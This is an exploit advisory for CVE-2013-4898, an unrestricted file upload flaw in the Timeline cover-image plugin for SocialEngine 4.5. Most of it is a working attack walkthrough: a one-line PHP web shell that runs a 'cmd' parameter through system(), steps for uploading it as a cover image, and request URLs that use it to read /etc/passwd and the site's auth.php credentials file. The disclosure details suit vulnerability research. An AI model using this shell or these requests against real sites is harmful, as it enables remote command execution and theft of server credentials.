52 lines
No EOL
1.7 KiB
Text
52 lines
No EOL
1.7 KiB
Text
# Exploit Title: Sending php file in the timeline plugin cover image of SocialEngine 4.5
|
||
# Date: 2013-08-17
|
||
# Discovered by: Wesley Henrique Leite aka "spyk2r"
|
||
# Vendor Homepage: http://webhive.com.ua/
|
||
# Software Link: http://webhive.com.ua/store/product.php?id_product=46
|
||
# Version: plugin Timeline 4.2.5p9 for SocialEngine 4.5
|
||
# Vendor Notified: 2013-08-17
|
||
# CVE Notified: 2013-08-24
|
||
# CVE : CVE-2013-4898
|
||
|
||
|
||
+ INTRODUCTION
|
||
|
||
The plugin has the objective give you a better visual for the user
|
||
profile, allowed the addition of cover image keeping the layout closest
|
||
to the style of modern social networks, among other features.
|
||
|
||
+ DESCRIPTION OF VULNERABILITY
|
||
|
||
Logged into the system, enter on profile page of your user. [my profile]
|
||
|
||
http://[url]/index.php/profile/[profile-name]
|
||
|
||
>> Click "Change Cover"
|
||
|
||
>> Click "Upload Cover"
|
||
|
||
select the file "*.php" you want to send.
|
||
|
||
//### Example PHP file to send "inject.php" ###
|
||
<?php echo system("$_GET['cmd']"); ?>
|
||
//###
|
||
|
||
After selecting the file upload, this will be sent to an area temporarily,
|
||
the system detects that the format is not valid, but doesn’t remove,
|
||
allowing access later.
|
||
|
||
an error message is displayed on the screen.
|
||
|
||
[ File "/srv/www/htdocs/XXXXXXXXXXX/public/temporary/timeline/cover_original_8.php"
|
||
is not an image or does not exist ]
|
||
|
||
+ ACCESS
|
||
|
||
/srv/www/htdocs/XXXXXXXXXXX/public/temporary/timeline/cover_original_8.php
|
||
|
||
The important thing is the structure of public forward, it will give
|
||
us access to our archive.
|
||
|
||
http://[url]/public/temporary/timeline/cover_original_8.php?cmd=cat%20/etc/passwd
|
||
|
||
http://[url]/public/temporary/timeline/cover_original_8.php?cmd=cat%20../../../install/config/auth.php |